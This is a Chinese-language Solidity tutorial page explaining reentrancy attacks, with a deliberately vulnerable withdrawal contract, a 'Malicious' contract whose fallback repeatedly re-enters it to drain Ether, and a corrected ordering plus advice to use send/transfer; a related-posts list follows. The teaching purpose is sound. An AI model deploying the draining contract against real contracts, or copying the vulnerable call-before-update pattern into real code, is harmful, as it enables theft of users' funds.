2. 程式人生 > >solidity智慧合約[53]-安全-重入***

solidity智慧合約[53]-安全-重入***

阿新 發佈:2018-11-30

重入***

當呼叫外部的合約時,外部合約會接管控制流程,從而可能給自己的資料帶來意想不到的修改。2016年6月,以太坊最大眾籌專案The DAO被***,***獲得超過350萬個以太幣。正是由於此陷阱。

重入***本質

1、呼叫外部合約
2、fallback回撥函式被多次執行
3、邏輯順序出現問題
4、call函式沒有gaslimit的限制。
5、call函式返回值為true或false。出錯不會執行回滾。

案例剖析

1、部署合約Vulnerable、Malicious、transferEther,假設地址為 addrA、addrB、addrC
2、 將addrB傳遞到 Vulnerable合約的 add中。 完成此操作後,將balance對映的金額增加100。附帶5 ether。讓Vulnerable合約一開始就有5 ether。
3、將addrA的地址傳遞到Malicious合約的instance中,儲存地址。

4、呼叫transferEther合約的test方法,傳遞addrB的地址。由於合約的轉賬方法出發了fallback回撥函式。因此執行了Vulnerable合約中的withdrawEquity方法。此方法執行了語句 msg.sender.call.value(x)();而當前的msg.sender為Malicious合約地址,又會再次執行Malicious合約的回撥函式。而這時, ____balanceOf[msg.sender] 的金額還沒有變為0.使得Vulnerable不停的轉移資金給Malicious合約。一直到到達了gaslimit的限制從而終止。但是由於call函式返回值為true或false。只有最後的函數出錯會執行回滾。其他函式會正常的執行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
 

contract Vulnerable{


    mapping(address =>uint) public _balanceOf;

    function withdrawEquity() public returns(bool){

        uint x = _balanceOf[msg.sender];
 

        msg.sender.call.value(x)();
        _balanceOf[msg.sender] = 0 ;
        return true;
    }

    function add(address _addr) payable{
        _balanceOf[_addr] = 100;
    }

        function getBalance() returns(uint){
        return this.balance;
    }
}


contract Malicious{
    address private _owner;
    Vulnerable public vul;
    function setInstance(address addr) public{
         vul = Vulnerable(addr);

    }

    function Malicious() public {
        _owner = msg.sender;
    }

    function () public payable{
        vul.withdrawEquity();
    }

    function winnerWinnerChickenDinner() public{
        _owner.transfer(this.balance);
    }

    function getBalance() returns(uint){
        return this.balance;
    }
}

contract transferEther{
    function test(address _addr) payable{
        _addr.call.value(5 ether)();

    }
}

解決辦法

1、替換順序,這樣當重複執行withdrawEquity函式時,資金已經變為了0。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
function withdrawEquity() public returns(bool){

    uint x = _balanceOf[msg.sender];
    msg.sender.call.value(x)();
    _balanceOf[msg.sender] = 0 ;
    return true;
}
替換為:
function withdrawEquity() public returns(bool){
    uint x = _balanceOf[msg.sender];
    _balanceOf[msg.sender] = 0 ;
    msg.sender.call.value(x)();
    return true;
}

2、替換為更安全的send、transfer函式
3、對於呼叫外部合約的時候保持警惕。

image.png

相關推薦

solidity智慧合約[53]-安全-***

重入*** 當呼叫外部的合約時,外部合約會接管控制流程,從而可能給自己的資料帶來意想不到的修改。2016年6月,以太坊最大眾籌專案The DAO被***,***獲得超過350萬個以太幣。正是由於此陷阱。 重入***本質 1、呼叫外部合約2、fallback回撥函式被多次執行3、邏輯順序出現問題4、c

solidity智慧合約[49]-安全-溢位***

***回顧 1234567 2016年6月,以太坊最大眾籌專案The DAO被***,***獲得超過350萬個以太幣,最終導致以太坊分叉為ETH和ETC。2016年拒絕服務***:GovernMental's 1100 ETH2016年KotET(“紛爭時代”)合約遭受*

solidity智慧合約[54]-安全—取反

相反數 有符號的solidity整數型別如果有N位。那麼其值的範圍是-2^(N-1) to 2^(N-1)-1。 這意味著該型別負數的最大值取相反數之後不能夠被接收。 相反數陷阱 如下的Negation合約說明了負數在面臨取相反數操作時可能遇到的問題。由於對於負數取相反數。實則是取負數的補碼操作。因

solidity智慧合約[52]-安全-storage陷阱

storage陷阱 下面的合約是一個鎖定金額的合約,使用者將資金儲存在此合約中,只有當過了一段時間時候才能夠提取出來。下面的案例是為了說明storage屬性預設性帶來的陷阱。payIn函式是當用戶儲存金額時呼叫的函式。傳遞的引數似乎解鎖的時間。在合約payIn中,HoldRecord newRecord

solidity智慧合約[51]-安全—dos***

Dos*** dos***也叫做拒絕服務***,通過使程式操作無效完成***的目的。 下面的一段合約是2016年KotET(“紛爭時代”)合約,其遭受了dos***。本小節將揭開此合約被***的祕密。 原始碼 在下面KotET合約程式碼中,模擬了爭奪皇位的功能。只有出價最高的人才能夠奪得桂冠。 合

智慧合約系列006-攻擊(Reentrancy attack)】

solidity漏洞型別學習筆記(一) 以下程式碼內容皆參考於RICKGRAY師傅之前的文章《以太坊智慧合約安全入門瞭解一下》,在此記錄我在復現中發現的一些問題和學習記錄。 Reentrancy - 重入 首先我們先參考程式碼實現一個類似公共錢包的程式碼,

solidity智慧合約[10]-動態位元組陣列

動態位元組陣列的定義 bytes 變數名 = new bytes(大小); 動態位元組陣列的屬性 可以修改大小和長度 動態位元組陣列預設初始化為0 bytes public name = new bytes(2);name的值一開始為0x0000 動態位元組陣列的賦值

solidity智慧合約[9]-位元組陣列與運算

byte型別 有byte bytes1 bytes2 … bytes32特殊的有byte == bytes1 後面的數字代表佔了多少位元組。1個位元組在記憶體中佔了8位 性質 固定位元組陣列不能修改長度和內容 位元組一般用16進位制來儲存 16進制中的1個數字代表佔了4位。

solidity智慧合約[8]-位運算與字面量

位運算 solidity中,可以對於最底層的位進行操作。由於以太坊中需要消耗gas,因此,為了節約gas、所以對於位的操作會用到比較頻繁。solidity中支援多種型別的位運算操作1、位與 &2、位或 |3、位異或 ^4、位取反 ~5、<<6、>> 數字3、4的二進位制

solidity智慧合約[7]-整型與運算

整型變數 整數是現實中處理最多的單位,在solidity中的整數型別有int和uint,int型別可以儲存負數,uint型別只能夠儲存非負數。int型別:int8,int16,int24,int32…int256uint型別:uint8,uint16,uint24,uint32…uint256 後面的

solidity智慧合約[6]-基本型別與bool運算

變數 儲存資料的抽象單位,代表記憶體中的一段空間。 型別 同其他的程式語言一樣,solidity中也有許多基本的型別。型別決定了儲存空間的大小和解析的方式。下面列舉出了solidity中基本的型別int、uint、byte、string、bool 基本型別 bool型別 這一小節

solidity智慧合約[5]——一筆交易詳解

在之前,我們已經寫好了一個最簡單的helloworld合約,如下: 1234567891011121314151617 pragma solidity ^0.4.23;contract HelloWorld{    string public name

solidity智慧合約[4]-pure與view剖析

pure與view程式碼例子 如下的一段solidity智慧合約中,只要有了pure與view修飾符的函式,那麼呼叫函式就不會消耗gas。而沒有pure與view修飾的函式,如下面的change就會消耗gas。 12345678910111213141516171819

solidity智慧合約[19]-for迴圈

for for 語句為"當型"迴圈結構。for語句的語法為: 123 for ( 表示式 1; 表示式 2; 表示式){  語句} 說明:表示式 1為迴圈變數賦初始值。表示式 2為迴圈條件。表示式 3為迴圈變數增值。 for迴圈列印斐波拉

solidity智慧合約[18]-twoarray

二維陣列定義 1 uint[2][3] grade = [[60,80],[40,20],[50,50]]; 返回二維陣列 1234 function getGrade() view public returns(ui

solidity智慧合約[17]-動態長度陣列

動態長度陣列 動態長度陣列可以改變大小和長度 動態長度陣列的定義 uint[] grade=[1,2,3,4,5]; 返回動態長度陣列 123 function getArray() public view returns(uint[]){   &nbs

solidity智慧合約[16]-固定長度陣列

陣列 記憶體中的一片連續區域 定義 12 int[7] math;bytes2[3] bytesTest; 賦值 1 uint[5] public  grade =[1,2,3,4,5];

solidity智慧合約[15]-fixtostring

固定位元組陣列轉string 固定位元組陣列轉換為string沒有好的辦法,必須要首先將固定位元組陣列轉換為動態位元組陣列,再將動態位元組陣列轉換為string 123456789101112 //bytes2  ->  bytes  

solidity智慧合約[14]-動態位元組陣列轉換為string

動態位元組陣列轉換為string 動態位元組陣列可以通過string(name)非常直接的轉換為string型別,下面為例子: 1234567891011121314 pragma solidity ^0.4.23;contract dynamicTostring{ &

Solidity 語言學習(2)—— Solidity智慧合約檔案結構

版本申明 pragma solidity ^0.4.0; 說明: 1 版本要高於0.4才可以編譯 2 表示高於0.5的版本則不可編譯,第三位的版本號但可以變,留出來用做bug可以修復(如 0.4.1的編譯器有bug,可在0.4.2 修復,現有合約不用該程式碼)。 引用其他